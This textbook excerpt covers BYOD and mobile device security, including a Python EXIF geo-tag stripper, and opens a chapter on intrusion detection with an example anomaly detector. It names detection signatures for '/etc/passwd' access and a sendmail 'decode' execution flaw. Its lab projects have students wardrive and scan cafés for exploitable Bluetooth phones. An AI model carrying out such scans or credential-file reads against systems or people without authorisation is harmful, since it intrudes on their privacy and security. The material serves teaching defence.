AdherencetoCorporatePoliciesYourcorporatepoliciesregardingBYODdevicesshouldbeconsistentwithyourexistingcomputersecuritypolicies.Yourtrainingprogramsshouldincludeinstructiononmobiledevicesecurity.Disciplinaryactionsshouldbeconsistent.Yourmonitoringprogramsshouldbeenhancedtoincludemonitoringandcontrolofmobiledevices.
User Acceptance
BYOD inherently creates a conflict between personal and corporate interests. An employee who uses her own device to conduct corporate business feels strong ownership over the device and may resent corporate demands to control corporate information downloaded to it. On the other hand, the corporation expects corporate data to be properly controlled and protected, and so wants to impose remote wiping or lockout requirements to protect that data. An individual who loses her personal photos from a special event will likely harbor ill feelings toward the corporation if it wipes her device, including those irreplaceable photos. Your corporate BYOD policy needs to be well defined, approved by the corporate legal department, and clearly communicated to all employees through training.
Architecture/Infrastructure Considerations
Mobile devices consume connections to your corporate IT infrastructure. It is not unusual now for a single individual to be connected to the corporate infrastructure with one or more smartphones, tablets, and laptop or desktop computers. Some infrastructure implementations in the past have not been efficient in their design, sometimes consuming multiple connections for a single device, which reduces the number of connections available to other end users. Load testing is recommended to ensure that your design or existing infrastructure can support the potentially large number of connections from multiple devices. Multiple connections can also create security issues when the system tracks user accounts against multiple connections. Users will need to be aware of this, so that they don't inadvertently create incident response situations or find themselves locked out by their own actions. This can be a tricky issue, requiring a more intelligent design than the traditional philosophy of one user ID equals one current connection.

Legal Concerns
It should be apparent from the various topics discussed in this chapter that mobile devices used for corporate business present many security challenges. Because the technology is rapidly changing, it is best to make sure you have solid legal review of policies. There are both legal and public relations concerns when it comes to mobile devices. Employees who use both company-owned and personal devices have responsibilities when company data is involved. Policies and procedures should be reviewed on a regular basis to stay current with technology. Another challenge presented by mobile devices is the possibility that they will be used for illegal purposes, which can create liability for the company if it is a company-owned device.

Acceptable Use Policy
Similar to your acceptable use policies for laptops and desktops, your mobile device policies should address acceptable use of mobile or BYOD devices. Authorized usage of corporate devices for personal purposes should be addressed. Disciplinary actions for violation of mobile device policies should be defined. BYOD offers both the company and the user advantages; the ramifications should be specifically spelled out, along with the specific user responsibilities.

Exam Tip: Mobile devices offer many usability advantages across the enterprise, and they can be managed securely with the help of security-conscious users. Security policies can go a long way toward helping users understand their responsibilities associated with mobile devices and sensitive data.
Location Services
Mobile devices by their very nature can move, and hence the location of the device can have significant ramifications with respect to its use. Mobile devices can connect to multiple public Wi-Fi locations, and they can provide users with navigation and other location-sensitive information, such as a local sale. To enable this functionality, location services are a set of functions that enable, yet control, the location information possessed by the device.

Geo-Tagging
Geo-tagging is the posting of location information into a data stream, signifying where the device was when the stream was created. Because many mobile devices include on-board cameras, and the photos and videos they take can divulge information, geo-tagging can make location part of any picture or video. This information can be associated with anything the camera can image: whiteboards, documents, and, via the geo-tag, the location of the device when the photo or video was taken. Posting photos with geo-tags embedded in them has its uses, but it can also unexpectedly publish information that users may not want to share. For example, if you use your smartphone to take a photo of your car in the driveway and then post the photo on the Internet in an attempt to sell your car, and geo-tagging was enabled on the smartphone, the location where the photo was taken is embedded as metadata (the EXIF GPS tags) in the digital photo. Such a posting could inadvertently expose where your home is located. Some social media applications strip the metadata from a photo before posting, but then they record where you posted it from in the posting itself. There has been much public discussion on this topic, and geo-tagging can be disabled on most mobile devices. It is recommended that it be disabled unless you have a specific reason for having the location information embedded in the photo.
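As an added illustration (this is not code from the book), the following Python reads the GPS tags out of the EXIF metadata a camera embeds in a photo and shows what stripping them amounts to. EXIF is a TIFF-structured blob that a JPEG carries in its APP1 segment after the "Exif" marker; the sample blob here is constructed in code rather than taken from a real photo, the coordinates are arbitrary, and only the little-endian byte order and the handful of tags the sample uses are handled.

```python
"""Added example (not the book's code): read and strip the GPS geo-tag from
an EXIF (TIFF-structured) metadata blob of the kind a JPEG carries in its
APP1 segment after the "Exif\\0\\0" marker.  The sample blob is constructed
below; only little-endian ("II") byte order and the tags the sample uses
are handled, and chained or other sub-IFDs are not followed."""
import struct

TYPE_SIZE = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 7: 1}  # BYTE, ASCII, SHORT, LONG, RATIONAL, UNDEFINED
GPS_IFD_POINTER = 0x8825                            # IFD0 tag pointing at the GPS sub-IFD
GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON = 0x0001, 0x0002, 0x0003, 0x0004
ORIENTATION = 0x0112


def read_ifd(blob, offset):
    """Return [(tag, type, count, 4 raw value/offset bytes)] for the IFD at offset."""
    (n,) = struct.unpack_from("<H", blob, offset)
    return [struct.unpack_from("<HHI4s", blob, offset + 2 + 12 * i) for i in range(n)]


def entry_data(blob, typ, count, raw):
    """Entry payload: stored inline if it fits in 4 bytes, otherwise at an offset."""
    size = TYPE_SIZE[typ] * count
    if size <= 4:
        return raw[:size]
    (off,) = struct.unpack("<I", raw)
    return blob[off:off + size]


def write_ifd(entries, ifd_offset):
    """Serialise (tag, type, count, payload) entries at ifd_offset; payloads larger
    than 4 bytes go into a data area after the IFD and the entry points at them."""
    ifd_len = 2 + 12 * len(entries) + 4
    out, data_area = struct.pack("<H", len(entries)), bytearray()
    for tag, typ, count, data in entries:
        if len(data) <= 4:
            raw = data.ljust(4, b"\x00")
        else:
            raw = struct.pack("<I", ifd_offset + ifd_len + len(data_area))
            data_area += data
        out += struct.pack("<HHI4s", tag, typ, count, raw)
    return out + struct.pack("<I", 0) + bytes(data_area)   # 0 = no next IFD


def to_dms(degrees):
    """Degrees -> three RATIONALs (deg/1, min/1, sec*100/100) as EXIF stores them."""
    value = abs(degrees)
    d = int(value)
    m = int((value - d) * 60)
    s = round(((value - d) * 60 - m) * 60 * 100)
    return struct.pack("<IIIIII", d, 1, m, 1, s, 100)


def from_dms(data):
    n = struct.unpack("<IIIIII", data)
    return n[0] / n[1] + n[2] / n[3] / 60 + n[4] / n[5] / 3600


def build_sample_exif(lat, lon):
    """Constructed sample: IFD0 holding Orientation and a pointer to a GPS IFD."""
    ifd0_offset = 8
    gps_offset = ifd0_offset + 2 + 12 * 2 + 4          # IFD0 has two inline entries
    ifd0 = write_ifd([(ORIENTATION, 3, 1, struct.pack("<H", 1)),
                      (GPS_IFD_POINTER, 4, 1, struct.pack("<I", gps_offset))], ifd0_offset)
    gps = write_ifd([(GPS_LAT_REF, 2, 2, (b"N" if lat >= 0 else b"S") + b"\x00"),
                     (GPS_LAT, 5, 3, to_dms(lat)),
                     (GPS_LON_REF, 2, 2, (b"E" if lon >= 0 else b"W") + b"\x00"),
                     (GPS_LON, 5, 3, to_dms(lon))], gps_offset)
    return b"II*\x00" + struct.pack("<I", ifd0_offset) + ifd0 + gps


def extract_gps(blob):
    """Return (lat, lon) in decimal degrees if a GPS IFD is present, else None."""
    if blob[:4] != b"II*\x00":
        raise ValueError("only little-endian EXIF is handled in this example")
    (ifd0_offset,) = struct.unpack_from("<I", blob, 4)
    gps = {}
    for tag, typ, count, raw in read_ifd(blob, ifd0_offset):
        if tag == GPS_IFD_POINTER:
            (gps_offset,) = struct.unpack("<I", raw)
            for t, ty, c, r in read_ifd(blob, gps_offset):
                gps[t] = entry_data(blob, ty, c, r)
    if GPS_LAT not in gps or GPS_LON not in gps:
        return None
    lat = from_dms(gps[GPS_LAT]) * (-1 if gps.get(GPS_LAT_REF, b"N")[:1] == b"S" else 1)
    lon = from_dms(gps[GPS_LON]) * (-1 if gps.get(GPS_LON_REF, b"E")[:1] == b"W" else 1)
    return round(lat, 4), round(lon, 4)


def strip_gps(blob):
    """Rebuild IFD0 without the GPS pointer; the GPS IFD's bytes are simply not
    copied, so the location is gone from the output rather than merely unlinked."""
    (ifd0_offset,) = struct.unpack_from("<I", blob, 4)
    kept = [(tag, typ, count, entry_data(blob, typ, count, raw))
            for tag, typ, count, raw in read_ifd(blob, ifd0_offset)
            if tag != GPS_IFD_POINTER]
    return b"II*\x00" + struct.pack("<I", 8) + write_ifd(kept, 8)


if __name__ == "__main__":
    tagged = build_sample_exif(48.8584, 2.2945)        # arbitrary sample coordinates
    print("before strip:", extract_gps(tagged))
    print("after strip: ", extract_gps(strip_gps(tagged)))
```

The point of rebuilding the IFD rather than just zeroing the pointer is that a stripper which only unlinks the GPS IFD leaves the coordinates sitting in the file for anyone with a hex editor; a real tool also has to handle the Exif sub-IFD, the big-endian ("MM") byte order, and thumbnails, which this example leaves out.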
Mobile Application Security
Devices are not the only concern in the mobile world. Applications that run on the devices also represent security threats to the information that is stored on and processed by the device. Applications are the software elements that can be used to violate security, even when the user is not aware. Many games and utilities offer value to the user, but at the same time they scrape the information stores on the device.

Application Control
Most mobile device vendors provide some kind of app store for finding and purchasing apps for their mobile devices. The vendors do a reasonable job of making sure that offered apps are approved and don't create an overt security risk. Yet many apps request access to various information stores on the mobile device as part of their business model. Understanding what access is requested and approved upon installation of apps is an important security precaution. Your company may have to restrict the types of apps that can be downloaded and used on mobile devices. If you need very strong protection, your company can be proactive and provide an enterprise app store where only company-approved apps are available, with a corresponding policy that apps cannot be obtained from any other source.

Key and Credential Management
The MDM marketplace is maturing quickly. Key and credential management services are being integrated into most MDM services to ensure that existing strong policies and procedures can be extended securely to mobile platforms. These services include protection of keys for digital signatures and for S/MIME encryption and decryption. Keys and credentials are among the highest-value items that can be found on mobile devices, so ensuring protection for them is a key element of mobile device security. The keys and credentials stored on the device can be used by multiple applications; providing protection for these keys while still maintaining their usability is an essential element of modern mobile application security.

Authentication
When mobile devices are used to access business networks, authentication becomes an issue at several levels. Is the device allowed to access the network? Is the user of the device a network user? If so, how do you authenticate the user? Mobile devices have some advantages in that they can store certificates, which cannot be guessed or phished the way passwords can. This moves the authentication problem to the endpoint, where it relies on passcodes, screen locks, and other mobile device protections. These can be relatively weak unless structured together, including wiping after a limited number of failures. The risk in mobile authentication is that strong credentials stored in the device are protected by the less rigorous passcode and by the end user. End users can share their mobile devices, and by proxy unwittingly share their strong corporate authentication credentials.

Application Whitelisting
As discussed in the "Application Control" section earlier in the chapter, controlling what applications a device can run may be an important element of your company's mobile device policy. Application whitelisting and blacklisting enable you to control and block the applications available on the mobile device. This is usually administered through some type of MDM capability. Application whitelisting improves security by preventing unapproved applications from being installed and run on the device.

Encryption
Just as the device should be encrypted, thereby protecting all information on the device, application data should be encrypted as well. Employing encryption for the device's data store alone is not sufficient: once the device is unlocked, every app on it can read whatever data the operating system lets it reach, so from an app's point of view the device encryption has been bypassed. Apps holding sensitive information should control access via their own set of protections. Beyond the operating system's sandbox, the way to segregate data within the device is for apps to manage their own data stores through app-specific encryption. This allows sensitive data to be protected from rogue applications that would leak data if uniform access were allowed.

Transitive Trust/Authentication
Security across multiple domains or platforms is provided through trust relationships. When trust relationships between domains or platforms exist, authentication for each domain trusts the authentication for all other trusted domains. Thus when an application is authenticated, its authentication is accepted by all other domains and platforms that trust the authenticating domain or platform. Trust relationships can be very complex on mobile devices, and often the security aspects aren't properly implemented. Mobile devices tend to be used across numerous systems, including business, personal, public, and private, which greatly expands the risk profile and the opportunity for transitive trust-based attacks. As with all other applications, mobile applications should be carefully reviewed to ensure that trust relationships are secure.
Chapter 12 Review

Chapter Summary
After reading this chapter and completing the exercises, you should understand the following about wireless security and mobile devices.

Describe the different wireless systems in use today
• Wireless Application Protocol (WAP) is used on small, handheld devices like cell phones for out-of-the-office connectivity.
• 802.11 is the IEEE standard for wireless local area networks. The standard includes several different specifications of 802.11 networks, such as 802.11b, 802.11a, 802.11g, and 802.11n.

Detail WAP and its security implications
• WAP is the data protocol used by many cellular phones to deliver e-mail and lightweight web services.
• Designers created WTLS as a method to ensure privacy of data being broadcast over WAP.
• WTLS has a number of inherent security problems, such as weak encryption necessitated by the low computing power of the devices, and the network transition that must occur at the cellular provider's network, known as the WAP gap.

Identify 802.11's security issues and possible solutions
• 802.11 does not allow physical control of the transport mechanism.
• Wireless transmission delivers frames to every wireless machine in range, not just a single client, similar to Ethernet hub devices.
• Authentication is weak because the SSID is broadcast to anyone listening.
• WEP's flawed use of the RC4 encryption algorithm (short initialization vectors that are reused) makes even encrypted traffic subject to interception and decryption.

Examine the elements needed for enterprise wireless deployment
• Wireless coverage is a function of antenna type, placement, and power levels.
• Captive portals can be used to control access to wireless systems.

Examine the security of mobile systems
• Mobile devices have specific security concerns and specific controls to assist in securing them.
• BYOD has its own concerns, and its own policies and procedures to manage mobile devices in the enterprise.
• Mobile applications require security, and the issues associated with mobile devices, apps, and security need to be addressed.
Key Terms
2.4 GHz band, 5 GHz band, beacon frames, bluebugging, bluejacking, bluesnarfing, Bluetooth DOS, captive portal, confidentiality, direct-sequence spread spectrum (DSSS), evil twin, geo-tagging, IEEE 802.1X, IEEE 802.11, initialization vector (IV), jailbreaking, MAC filtering, MIMO, mobile device management (MDM), near field communication (NFC), orthogonal frequency division multiplexing (OFDM), RC4 stream cipher, remote wiping, rogue access point, screen locking, service set identifier (SSID), site survey, Temporal Key Integrity Protocol (TKIP), WAP gap, Wi-Fi Protected Access 2 (WPA2), WiMax, Wired Equivalent Privacy (WEP), Wireless Application Protocol (WAP), Wireless Transport Layer Security (WTLS), ZigBee
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don't use the same term more than once. Not all terms will be used.
1. An AP uses _______________ to advertise its existence to potential wireless clients.
2. The _______________ is the part of the RC4 cipher that has a weak implementation in WEP.
3. Two common mobile device security measures are _______________ and _______________.
4. WAP uses the _______________ protocol to attempt to ensure confidentiality of data.
5. The 32-character identifier attached to the header of a packet used for authentication to an 802.11 access point is the _______________.
6. _______________ is a feature that can disclose a user's position when sharing photos.
7. 802.11i updates the flawed security deployed in _______________.
8. The standard for wireless local area networks is called _______________.
9. The type of application used to control security across multiple mobile devices in an enterprise is called _______________.
10. 802.11a uses frequencies in the _______________.
Multiple-Choice Quiz
1. Bluebugging can give an attacker what?
A. All of your contacts
B. The ability to send "shock" photos
C. Total control over a mobile phone
D. A virus
2. How does 802.11n improve network speed?
A. Wider bandwidth
B. Higher frequency
C. Multiple-input multiple-output (MIMO)
D. Both A and C
3. WTLS ensures integrity through what device?
A. Public key encryption
B. Message authentication codes
C. Source IP
D. Digital signatures
4. WEP has used an implementation of which of the following encryption algorithms?
A. SHA
B. ElGamal
C. RC4
D. Triple-DES
5. What element does not belong in a mobile device security policy in an enterprise employing BYOD?
A. Separation of personal and business-related information
B. Remote wiping
C. Passwords and screen-locking
D. Mobile device carrier selection
6. What is bluejacking?
A. Stealing a person's mobile phone
B. Sending an unsolicited message via Bluetooth
C. Breaking a WEP key
D. Leaving your Bluetooth in discoverable mode
7. While the SSID provides some measure of authentication, why is it not very effective?
A. It is dictated by the manufacturer of the access point.
B. It is encrypted.
C. It is broadcast in every beacon frame.
D. SSID is not an authentication function.
8. The 802.1X protocol is a protocol for Ethernet:
A. Authentication
B. Speed
C. Wireless
D. Cabling
9. What is the best way to avoid problems with Bluetooth?
A. Keep personal info off your phone
B. Keep Bluetooth discoverability off
C. Buy a new phone often
D. Encryption
10. Why is attacking wireless networks so popular?
A. There are more wireless networks than wired.
B. They all run Windows.
C. It's easy.
D. It's more difficult and more prestigious than other network attacks.
Essay Quiz
1. Produce a report on why sensitive information should not be sent over the Wireless Application Protocol.
2. When you want to start scanning for rogue wireless networks, your supervisor asks you to write a memo detailing the threats of rogue wireless access points. What information would you include in the memo?
3. Write a security policy for company-owned cell phones that use the Bluetooth protocol.
4. Write a memo recommending upgrading your organization's old 802.11b infrastructure to an 802.11i-compliant network, and detail the security enhancements.
Lab Projects
• Lab Project 12.1 Set up NetStumbler or Kismet on a computer, and then use it to find wireless access points. You will need the following:
A laptop with Windows or Linux installed
A compatible wireless 802.11 network adapter
Then do the following:
1. Download NetStumbler from www.netstumbler.com or Kismet from www.kismetwireless.net.
2. For NetStumbler, run the Windows Installer. For Kismet, untar the source file and then execute, in order, ./configure, make, and make install.
3. Start the program and make sure that it sees your wireless adapter.
4. Take the laptop on your normal commute (or drive around your neighborhood) with NetStumbler/Kismet running.
5. Log any access points you detect.
• Lab Project 12.2 Attempt to scan the area for Bluetooth devices. You will need a cell phone with Bluetooth installed or a computer with a Bluetooth adapter. Then do the following:
1. If you're using a PC, download BlueScanner from SourceForge at http://sourceforge.net/projects/bluescanner/.
2. Take your phone or computer to a place with many people, such as a café.
3. Start the program and make sure that it sees your Bluetooth adapter.
4. Attempt to scan for vulnerable Bluetooth devices.
5. If you're using your phone, tell it to scan for Bluetooth devices. Any devices that you find are running in "discoverable" mode and are potentially exploitable.
Chapter 13 Intrusion Detection Systems and Network Security

One person's "paranoia" is another person's "engineering redundancy."
—MARCUS J. RANUM

In this chapter, you will learn how to
• Apply the appropriate network tools to facilitate network security
• Determine the appropriate use of tools to facilitate network security
• Apply host-based security applications

An intrusion detection system (IDS) is a security system that detects inappropriate or malicious activity on a computer or network. Most organizations use their own approaches to network security, choosing the layers that make sense for them after they weigh risks, potential for loss, costs, and manpower requirements. The foundation for a layered network security approach usually starts with a well-secured system, regardless of the system's function (whether it's a user PC or a corporate e-mail server). A well-secured system uses up-to-date application and operating system patches, requires well-chosen passwords, runs the minimum number of services necessary, and restricts access to available services. On top of that foundation, you can add layers of protective measures such as antivirus products, firewalls, sniffers, and IDSs. Some of the more complicated and interesting types of network/data security devices are IDSs, which are to the network world what burglar alarms are to the physical world. The main purpose of an IDS is to identify suspicious or malicious activity, note activity that deviates from normal behavior, catalog and classify the activity, and, if possible, respond to the activity.
History of Intrusion Detection Systems
Like much of the network technology we see today, IDSs grew from a need to solve specific problems. Like the Internet itself, the IDS concept came from U.S. Department of Defense-sponsored research. In the early 1970s, the U.S. government and military became increasingly aware of the need to protect the electronic networks that were becoming critical to daily operations.

Early History of IDS
In 1972, James Anderson published a paper for the U.S. Air Force outlining the growing number of computer security problems and the immediate need to secure Air Force systems (James P. Anderson, "Computer Security Technology Planning Study, Volume 2," October 1972, http://seclab.cs.ucdavis.edu/projects/history/papers/ande72.pdf). Anderson continued his research and in 1980 published a follow-up paper outlining methods to improve security auditing and surveillance ("Computer Security Threat Monitoring and Surveillance," April 15, 1980, http://csrc.nist.gov/publications/history/ande80.pdf). In this paper, Anderson pioneered the concept of using system audit files to detect unauthorized access and misuse. He also suggested the use of automated detection systems, which paved the way for misuse detection on the mainframe systems in use at the time. While Anderson's work got the efforts started, the concept of a real-time, rule-based IDS didn't really exist until Dorothy Denning and Peter Neumann developed the first real-time IDS model, the Intrusion Detection Expert System (IDES), from their research between 1984 and 1986. In 1987, Denning published "An Intrusion-Detection Model," a paper that laid out the model on which most modern IDSs are based (IEEE Transactions on Software Engineering, Vol. SE-13, No. 2, February 1987, pp. 222-232).

The U.S. government continued to fund research that led to projects such as Discovery, Haystack, Multics Intrusion Detection and Alerting System (MIDAS), and Network Audit Director and Intrusion Reporter (NADIR). Finally, in 1989, Haystack Labs released Stalker, the first commercial IDS. Stalker was host-based and worked by comparing audit data to known patterns of suspicious activity. While the military and government embraced the concept, the commercial world was very slow to adopt IDS products, and it was several years before other commercial products began to emerge. In the early to mid-1990s, as computer systems continued to grow, companies started to realize the importance of IDSs; however, the solutions available were host-based and required a great deal of time and money to manage and operate effectively. Focus began to shift away from host-based systems, and network-based IDSs began to emerge. In 1995, WheelGroup was formed in San Antonio, Texas, to develop the first commercial network-based IDS product, called NetRanger. NetRanger was designed to monitor network links and the traffic moving across them to identify misuse as well as suspicious and malicious activity. NetRanger's release was quickly followed by Internet Security Systems' RealSecure in 1996. Several other players followed suit and released their own IDS products, but it wasn't until the networking giant Cisco Systems acquired WheelGroup in February 1998 that IDSs were recognized as a vital part of any network security infrastructure. Figure 13.1 offers a timeline for these developments.

• Figure 13.1 History of the Internet and IDS
IDS Overview
As mentioned, an IDS is somewhat like a burglar alarm. It watches the activity going on around it and tries to identify undesirable activity. IDSs are typically divided into two main categories, depending on how they monitor activity:

Exam Tip: Know the differences between host-based and network-based IDSs. A host-based IDS runs on a specific system (server or workstation) and looks at all the activity on that host. A network-based IDS sniffs traffic from the network and sees only activity that occurs on the network.

Host-based IDS (HIDS)  Examines activity on an individual system, such as a mail server, web server, or individual PC. It is concerned only with an individual system and usually has no visibility into the activity on the network or systems around it.

Network-based IDS (NIDS)  Examines activity on the network itself. It has visibility only into the traffic crossing the network link it is monitoring and typically has no idea of what is happening on individual systems.

Whether it is network- or host-based, an IDS typically consists of several specialized components working together, as illustrated in Figure 13.2. These components are often logical and software-based rather than physical and will vary slightly from vendor to vendor and product to product. Typically, an IDS has the following logical components:

• Figure 13.2 Logical depiction of IDS components

Traffic collector (or sensor)  Collects activity/events for the IDS to examine. On a HIDS, this could be log files, audit logs, or traffic coming to or leaving a specific system. On a NIDS, this is typically a mechanism for copying traffic off the network link, basically functioning as a sniffer. This component is often referred to as a sensor.

Analysis engine  Examines the collected network traffic and compares it to known patterns of suspicious or malicious activity stored in the signature database. The analysis engine is the "brains" of the IDS.

Signature database  A collection of patterns and definitions of known suspicious or malicious activity.

User interface and reporting  Interfaces with the human element, providing alerts when appropriate and giving the user a means to interact with and operate the IDS.

Tech Tip
IDS Signatures
An IDS relies heavily on its signature database, just as antivirus products rely on their virus definitions. If an attack is something completely new, an IDS may not recognize the traffic as malicious.

Let's look at an example to see how all these components work together. Imagine a network intruder is scanning your organization for systems running a web server. The intruder launches a series of network probes against every IP address in your organization. The traffic from the intruder comes into your network and passes through the traffic collector (sensor). The traffic collector forwards the traffic to the analysis engine. The analysis engine examines and categorizes the traffic: it identifies a large number of probes coming from the same outside IP address (the intruder). The analysis engine compares the observed behavior against the signature database and gets a match: the intruder's activity matches a TCP port scan, because the intruder is sending probes to many different systems in a short period of time. The analysis engine generates an alarm that is passed off to the user interface and reporting mechanisms. The user interface generates a notification to the administrator (icon, log entry, and so on). The administrator sees the alert and can now decide what to do about the potentially malicious traffic. Alarm storage is simply a repository of the alarms the IDS has recorded; most IDS products allow administrators to run customized reports that sift through the collected alarms for items the administrator is searching for, such as all the alarms generated by a specific IP address.

Most IDSs can be tuned to fit a particular environment. Certain signatures can be turned off, telling the IDS not to look for certain types of traffic. For example, if you are operating in a pure UNIX environment, you may not wish to see Windows-based alarms, as they will not affect your systems. Additionally, the severity of the alarm levels can be adjusted depending on how concerned you are over certain types of traffic. Some IDSs also allow the user to exclude certain patterns of activity from specific hosts. In other words, you can tell the IDS to ignore the fact that some systems generate traffic that looks like malicious activity, because it really isn't.

In addition to the network versus host distinction, some IDS vendors further categorize an IDS based on how it performs the detection of suspicious or malicious traffic. The different models used are covered in the next section.
IDS Models
In addition to being divided along the host and network lines, IDSs are often classified according to the detection model they use: anomaly or misuse. For an IDS, a model is a method for examining behavior so that the IDS can determine whether that behavior is "not normal" or in violation of established policies.

An anomaly detection model is the more complicated of the two. In this model, the IDS must know what "normal" behavior on the host or network being protected really is. Once the "normal" behavior baseline is established, the IDS can then go to work identifying deviations from the norm, which are further scrutinized to determine whether or not that activity is malicious. Building the profile of normal activity is usually done by the IDS, with some input from security administrators, and can take days to months. The IDS must be flexible and capable enough to account for things such as new systems, new users, movement of information resources, and other factors, but sensitive enough to detect a single user illegally switching from one account to another at 3 A.M. on a Saturday.

Exam Tip: Anomaly detection looks for things that are out of the ordinary, such as a user logging in when he's not supposed to or unusually high network traffic into and out of a workstation.

Anomaly detection was developed to make the system capable of dealing with variations in traffic and better able to determine which activity patterns were malicious. A perfectly functioning anomaly-based system would be able to ignore patterns from legitimate hosts and users but still identify those patterns as suspicious should they come from a potential attacker. Unfortunately, most anomaly-based systems suffer from extremely high false positive rates, especially during the "break-in" period while the IDS is learning the network. On the other hand, an anomaly-based system is not restricted to a specific signature set and is far more likely to identify a new exploit or attack tool that would go unnoticed by a traditional IDS.

Exam Tip: Misuse detection looks for things that violate policy, such as a denial-of-service attack launched at your web server or an attacker attempting to brute-force an SSH session.

A misuse detection model is a little simpler to implement, and therefore it is the more popular of the two models. In a misuse detection model, the IDS looks for suspicious activity or activity that violates specific policies and then reacts as it has been programmed to do. This reaction can be an alarm, e-mail, router reconfiguration, or TCP reset message. Technically, misuse detection is the more efficient model, as it takes fewer resources to operate, does not need to learn what "normal" behavior is, and will generate an alarm whenever a pattern is successfully matched. However, the misuse model's greatest weakness is its reliance on a predefined signature base: any activity, malicious or otherwise, that the misuse-based IDS does not have a signature for will go undetected. Despite that drawback, and because it is easier and cheaper to implement, most commercial IDS products are based on the misuse detection model.

Some analysts break IDS models down even further into four categories depending on how the IDS operates and detects malicious traffic (the same models also apply to intrusion prevention systems, both NIPS and HIPS):

Behavior-based  This model relies on a collected set of "normal behavior": what should happen on the network and is considered "normal" or "acceptable" traffic. Behavior that does not fit into the "normal" activity categories or patterns is considered suspicious or malicious. This model can potentially detect zero-day or unpublished attacks but carries a high false positive rate, as any new traffic pattern can be labeled as "suspect."

Signature-based  This model relies on a predefined set of patterns (called signatures). The IDS has to know what behavior is considered "bad" ahead of time before it can identify and act upon suspicious or malicious traffic.

Anomaly-based  This model is essentially the same as behavior-based. The IDS is first taught what "normal" traffic looks like and then looks for deviations from those "normal" patterns.

Heuristic  This model uses rules or scoring algorithms (often described as artificial intelligence) that generalize beyond exact matches to decide whether a traffic pattern is malicious. For example, a URL containing 10 or more of the same repeating character may be considered "bad" traffic as a single signature. With a heuristic model, the IDS understands that if 10 repeating characters are bad, 11 are still bad, and 20 are even worse. This use of fuzzy logic places the heuristic model somewhere between the signature-based and behavior-based models.
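To make the difference between the models concrete, here is an added Python illustration (not the book's code): a tiny anomaly model that learns when each user normally logs in and then flags the 3 A.M. Saturday login the text mentions, next to a heuristic scorer for the repeated-character URL example. The login records and URLs are constructed in the code, and the profile rule (the set of weekdays and hours seen during learning) and the scoring thresholds are arbitrary choices for the example.

```python
"""Added example (not the book's code): an anomaly-detection baseline and a
heuristic scorer side by side.  All records below are constructed; the
profile rule and thresholds are arbitrary choices for the illustration."""
from collections import defaultdict
from datetime import datetime


class LoginBaseline:
    """Anomaly model: learn when each user normally logs in, then flag deviations."""

    def __init__(self):
        self.profile = defaultdict(set)   # user -> {(weekday, hour)} seen while learning
        self.learning = True

    def finish_learning(self):
        """End the break-in period; from now on deviations are reported, not learned."""
        self.learning = False

    def check(self, user, when):
        """Return a reason string if the login deviates from the baseline, else None."""
        if self.learning:
            self.profile[user].add((when.weekday(), when.hour))
            return None
        if user not in self.profile:
            return "unknown user"
        seen_days = {d for d, _ in self.profile[user]}
        seen_hours = {h for _, h in self.profile[user]}
        if when.weekday() not in seen_days:
            return "never seen on weekday %d" % when.weekday()
        if when.hour not in seen_hours:
            return "never seen at hour %02d" % when.hour
        return None


def longest_run(text):
    """Length of the longest run of one repeated character."""
    best = run = 1 if text else 0
    for prev, cur in zip(text, text[1:]):
        run = run + 1 if cur == prev else 1
        best = max(best, run)
    return best


def heuristic_url_score(url, threshold=10):
    """Heuristic model: a plain signature would match 'threshold repeated characters'
    exactly; this scorer treats longer runs as worse, saturating at twice the threshold."""
    run = longest_run(url)
    if run < threshold:
        return 0.0
    return min(1.0, run / (2 * threshold))


def run_sample():
    """Train on two constructed weeks of office-hours logins, then test."""
    model = LoginBaseline()
    for day in range(1, 15):                       # 1-14 March 2016 (Tuesday to Monday)
        when = datetime(2016, 3, day)
        if when.weekday() < 5:                     # weekdays only
            for hour in (8, 12, 17):
                model.check("alice", when.replace(hour=hour))
    model.finish_learning()
    return {
        "weekday_noon": model.check("alice", datetime(2016, 3, 16, 12)),   # Wednesday
        "weekday_late": model.check("alice", datetime(2016, 3, 16, 22)),
        "sat_3am": model.check("alice", datetime(2016, 3, 19, 3)),          # Saturday
        "stranger": model.check("mallory", datetime(2016, 3, 16, 12)),
        "url_ok": heuristic_url_score("/index.html?id=42"),
        "url_10": heuristic_url_score("/cgi-bin/" + "A" * 10),
        "url_20": heuristic_url_score("/cgi-bin/" + "A" * 20),
    }


if __name__ == "__main__":
    for name, verdict in run_sample().items():
        print(name, "->", verdict)
```

The false-positive problem the text describes is visible here: anything alice never happened to do during the two learning weeks, including a legitimate late evening at the office, is reported, while an attacker who logs in at noon on a Wednesday is invisible to this model.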
Signatures
As you have probably deduced from the discussion so far, one of the critical elements of any good IDS is the signature database: the set of patterns the IDS uses to determine whether or not activity is potentially hostile. Signatures can be very simple or remarkably complicated, depending on the activity they are trying to highlight. In general, signatures can be divided into two main groups, depending on what the signature is looking for: content-based and context-based.

Content-based signatures are generally the simplest. They are designed to examine the content of such things as network packets or log entries. Content-based signatures are typically easy to build and look for simple things, such as a certain string of characters or a certain flag set in a TCP packet. Here are some example content-based signatures:

• Matching the characters /etc/passwd in a Telnet session. On a UNIX system, the names of valid user accounts (and, on older systems, the hashed passwords for those accounts; modern systems keep the hashes in /etc/shadow) are stored in a file called passwd located in the etc directory.

• Matching the characters "to: decode" in the header of an e-mail message. On certain older versions of sendmail, sending an e-mail message to "decode" would cause the system to execute the contents of the e-mail.

Context-based signatures are generally more complicated, as they are designed to match large patterns of activity and examine how certain types of activity fit into the other activities going on around them. Context signatures generally address the question: How does this event compare to other events that have already happened or might happen in the near future? Context-based signatures are more difficult to analyze and take more resources to match, as the IDS must be able to "remember" past events to match certain context signatures. Here are some example context-based signatures:

• Match a potential intruder scanning for open web servers on a specific network. A potential intruder may use a port scanner to look for any systems accepting connections on port 80. To match this signature, the IDS must analyze all attempted connections to port 80 and then be able to determine which connection attempts are coming from the same source but are going to multiple, different destinations.

• Identify a Nessus scan. Nessus is a widely used vulnerability scanner (open source in its early releases, proprietary since 2005) that allows security administrators (and potential attackers) to quickly examine systems for vulnerabilities. Depending on the tests chosen, Nessus typically performs the tests in a certain order, one after the other. To be able to determine the presence of a Nessus scan, the IDS must know which tests Nessus runs as well as the typical order in which the tests are run.

